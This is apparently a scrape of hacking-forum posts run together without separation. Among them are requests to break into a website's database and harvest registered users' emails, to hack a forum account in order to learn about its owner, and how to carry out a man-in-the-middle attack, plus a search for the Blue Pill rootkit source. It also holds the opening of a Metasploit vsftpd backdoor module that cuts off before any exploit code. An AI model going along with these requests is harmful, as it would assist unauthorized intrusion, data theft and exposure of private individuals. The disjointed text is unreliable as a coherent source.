Need someone with high skills to get some projects completed before monday! Contact me if you have what it takes to get this done! I have moderate skills but what I need done I cannot do myself. Great opportunity for the right person!! New to site but not new to the world! Thanks
Hey does anyone happen to know where I could a the reference implimentation for Joanna Rutkowska's hypervisor rootkit, Blue Pill? I know her first version ran on AMD Pacifica machines and I thought that ITL was working on a VT-x version too. I'll take help with finding either or both.
Defcon 19 presentations available for download, Go check out the presentations from this year’s defcon conference here:
http://good.net/dl/k4r3lj/DEFCON19/
For folks that don't have time to click:
curl -silent http://good.net/dl/k4r3lj/DEFCON19/ | grep -i 'pdf' | cut -d '"' -f 8 | cut -d '<' -f 1 | grep -v '/' > dc19pdf.txt; for i in $(cat dc19pdf.txt); do curl --location "http://THIS-DOWNLOAD-WOULD-BE-FASTER-WITH-A-PREMIUM-ACCOUNT-AT-good.net" -L "http://good.net/dl/k4r3lj/DEFCON19/$i" > $i; done
Original Source: http://www.thehackernews.com/2011/08/defcon-19-presentations-from-defcon...
Can anyone confirm or deny this?(RaT & sx crew)This is quite interesting though
http://gizmodo.com/5829813/cdma-and-4g-wimax-supposedly-hacked-at-defcon
##
# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'VSFTPD v2.3.4 Backdoor Command Execution',
'Description' => %q{
This module exploits a malicious backdoor that was added to the VSFTPD download
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
June 30th 2011 and July 1st 2011 according to the most recent information
A website I am looking at says there is a possibility of a man in the middle attack but I am wondering how to go forward with that on a website. I have done some googling but haven't found too much so far.
Thanks!
OK, if one wanted to hack a forum username to obtain further info about that person (in theory) then can it be done?
I'm not asking for anyone to do it, and I'm not asking for a walkthrough - however, was just hoping for a few pointers such as:
- can it be done?
- what kind of skill level would the individual need to pull off such a feat?
- I assume brute forcing would leave lots of evidence on the server so wouldn't be a viable option?
- What areas of knowledge might one need to be proficiently versed in before trying this?
Thank you in advance for any feedback.
Hi guys,
looking for someone who can get into database of website and collect emails of registered users.
Anybody recognise what sort of coding this?
4 Œ0Dqc cDzãØðÿš×Kq
Furthermore, whether it can be decrypted? I guess it is a high-bit encryption with the need for a private key or something of that nature?
Any first impressions from you cryptography gurus would be cool... And before anyone asks I don't know what it says or relates to lol
Curious to know what others thought of this attack.
http://resources.infosecinstitute.com/slaac-attack/